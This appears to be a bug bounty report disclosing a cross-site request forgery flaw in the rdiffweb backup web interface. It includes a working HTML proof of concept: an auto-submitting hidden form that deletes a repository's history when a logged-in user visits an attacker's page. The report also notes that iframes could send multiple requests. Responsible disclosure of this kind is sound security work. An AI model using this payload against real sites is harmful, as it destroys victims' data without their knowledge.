Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Sep 11th 2021
Hello dear Rdiffweb team.
I found a CSRF vulnerability on following endpoint that attackers able to Delete repositories History with PoC.html
🕵️♂️ Proof of Concept
user with right privileges should be logged in Firefox or Safari.
Users go to a website that contain PoC.html
3.after visiting attacker's website a repo History with name
test-encoding will be deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://rdiffweb-demo.ikus-soft.com/delete/admin/testcases" method="POST"> <input type="hidden" name="confirm" value="testcases" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
Also attacker can send multiple request with help of Iframes.
I just want to suggest you to set a CSRF token for this form.